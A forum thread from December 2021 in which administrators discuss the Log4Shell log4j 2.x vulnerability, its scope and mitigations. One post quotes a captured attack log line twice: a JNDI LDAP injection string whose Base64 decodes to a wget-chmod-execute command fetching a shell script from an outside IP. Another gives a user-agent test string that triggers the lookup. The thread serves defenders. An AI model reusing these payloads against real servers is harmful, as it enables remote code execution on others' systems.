critical vulnerability in devel log4j

jb_fvwm2 · Dec 11, 2021

Tieks · Dec 11, 2021

Already out there. From my http log:

 45.137.21.9 - - [11/Dec/2021:03:42:17 +0100] "POST / HTTP/1.1" 301 230 "-" "${jndi:ldap://45.137.21.9:1389/Basic/Command/Base64/d2dldCBodHRwOi8vNjIuMjEwLjEzMC4yNTAvbGguc2g7Y2htb2QgK3ggbGguc2g7Li9saC5zaA==}"

Doesn't work in my case. That Base64 string decodes to "wget http://62.210.130.250/lh.sh;chmod +x lh.sh;./lh.sh".

mer · Dec 11, 2021

Well, make sure you read and understand the parameters of the CVE, if it's exposed to the big bad internet, see if you can turn it off.

Jose · Dec 11, 2021

Tieks said:
Already out there. From my http log:
45.137.21.9 - - [11/Dec/2021:03:42:17 +0100] "POST / HTTP/1.1" 301 230 "-" "${jndi:ldap://45.137.21.9:1389/Basic/Command/Base64/d2dldCBodHRwOi8vNjIuMjEwLjEzMC4yNTAvbGguc2g7Y2htb2QgK3ggbGguc2g7Li9saC5zaA==}"
Doesn't work in my case. That Base64 string decodes to "wget http://62.210.130.250/lh.sh;chmod +x lh.sh;./lh.sh".

Yup. Exploit attempts were detected at Fastly just 82 minutes after the release of the proof-of-concept code. We got hit with that one too. It creates a cron job to execute that wget periodically.

The two mitigations are to add -DformatMsgNoLookups=true to your Java startup options or upgrade to Log4j2 ver 2.15. We did the first really quickly yesterday, and will be doing the second throughout next week.

Maybe Hardworkingnewbie is right after all.

mer · Dec 11, 2021

Jose Tieks A question to me is:
What are you running that is exposing that to the Internet at large?

It appears to be a web server; if so, one could say as a mitigation "do not expose a web server to the internet at large".

And Yes, I know that's impractical, just trying to get the scope of things (verify/make sure I understand the CVE).

Tieks · Dec 11, 2021

mer said:
What are you running that is exposing that to the Internet at large?

Indeed a web server, Apache here. You need to use Java API Java Naming and Directory Interface (JNDI) for this exploit to work.

mer · Dec 11, 2021

Tieks Thanks. I'm not running anything Internet or internal facing, but my reading of the CVE led me to exactly this. Is it LDAP only?

mark_j · Dec 11, 2021

It's that JNDI service. It uses LDAP but not only uses it, also it can deserialise a class, which leads to the exploit. Who woulda thought you'd get hacked this way!

Just dumb.
More on serialisation is here.

msplsh · Dec 12, 2021

One of the exploit methods I've seen causes the process to connect to a port on a remote machine and effectively open a shell.

Jose · Dec 12, 2021

mer said:
Jose Tieks A question to me is:
What are you running that is exposing that to the Internet at large?

It appears to be a web server; if so, one could say as a mitigation "do not expose a web server to the internet at large".

It doesn't have to be directly exposed. Even behind something like Nginx, setting the user-agent header to something like ${jndi:ldap://127.0.0.1/a} can trigger the vulnerability if the back-end Java server logs the user-agent. This is a very common thing to do.

hruodr · Dec 12, 2021

I have no idea of java, but I thought, it is difficult / impossible to get stack overflows with it. Are the programmers of log4j really so smart to get one?

reddy · Dec 12, 2021

hruodr said:
I have no idea of java, but I thought, it is difficult / impossible to get stack overflows with it. Are the programmers of log4j really so smart to get one?

From what I understand the problem is not that this vulnerability causes a crash that can be exploited, but rather that because it allows any arbitrary class to be deserialized, this opens the door to the execution of arbitrary remote code within the java process (the attacker just needs to create a specially crafted class - encoded as a string parameter - whose deserialization will lead the process to make a remote call or download some files). From what I've read attackers are currently crafting special classes whose "deserialization" set ups a cronjob downloading and executing a shell script....

msplsh · Dec 12, 2021

You don't have to serialize the class, you can just point to the class on a remote server.

Jose · Dec 13, 2021

hruodr said:
I have no idea of java, but I thought, it is difficult / impossible to get stack overflows with it. Are the programmers of log4j really so smart to get one?

It's not a stack overflow (those are possible in Java, BTW.) The geniuses that wrote Log4j2 decided it would be a good idea to be able to use a remote class for formatting log messages. The class does have to be serialized.

SirDice · Dec 13, 2021

Spent most of my morning trying to deal with an onset of panic among managers and directors. How's your day going?

log4shell/software at main · NCSC-NL/log4shell

Operational information regarding the log4shell vulnerabilities in the Log4j logging library. - NCSC-NL/log4shell

github.com

SirDice · Dec 13, 2021

devel/log4j isn't vulnerable. The bug is specific to the 2.x branch. That said, as the, still growing, list shows it is embedded in quite a large number of different applications.

Crivens · Dec 13, 2021

Our cyber spooks are on it, so... run for the hills!

Btw, that is java, yes?

shkhln · Dec 13, 2021

Jose said:
It's not a stack overflow

Yes, this a Java equivalent of someone knowingly using eval on user input (I don't think downloading byte code counts as deserialization, by the way). Not unlike that infamous ElasticSearch issue.

SirDice · Dec 13, 2021

Crivens said:
Btw, that is java, yes?

It's a Java class, yes. But it's quite prevalent.

Dies_Irae · Dec 13, 2021

SirDice said:
Spent most of my morning trying to deal with an onset of panic among managers and directors. How's your day going?

log4shell/software at main · NCSC-NL/log4shell

Operational information regarding the log4shell vulnerabilities in the Log4j logging library. - NCSC-NL/log4shell

github.com

Quietly patching some applications, without telling anyone what I'm doing...

Low profile, no panic, everyone happy

SirDice · Dec 13, 2021

Dies_Irae said:
no panic

Panic seems to mostly coming from managers, department heads and directors who watched the news during the weekend. Now everyone wants to know everything. And I'm just thinking, go ask SOC. It's what they're there for.

covacat · Dec 13, 2021

if i understood correctly this bug is at least 4 years old, since ver 2.10
the myth of open source => more eyes => more secure busted again

SirDice · Dec 13, 2021

covacat said:
if i understood orrectly this bug is at least 4 years old, since ver 2.10
the myth of open source => more eyes => more secure busted again

I still remember that BSD bug that was there for 34+ years

mer · Dec 13, 2021

SirDice thanks for that link. The list is "impressive". I've seen similar intertwinning with Javascript, Node.js and other stuff.

SirDice · Dec 13, 2021

mer said:
@SirDice thanks for that link.

It's from the Dutch NCSC (National Cyber Security Center). They are continuously updating it.

critical vulnerability in devel log4j

jb_fvwm2

Tieks

mer

Jose

mer

Tieks

mer

mark_j

msplsh

Jose

hruodr

reddy

msplsh

Jose

SirDice

Administrator

log4shell/software at main · NCSC-NL/log4shell

SirDice

Administrator

Crivens

Administrator

shkhln

SirDice

Administrator

Dies_Irae

log4shell/software at main · NCSC-NL/log4shell

SirDice

Administrator

covacat

SirDice

Administrator

mer

SirDice

Administrator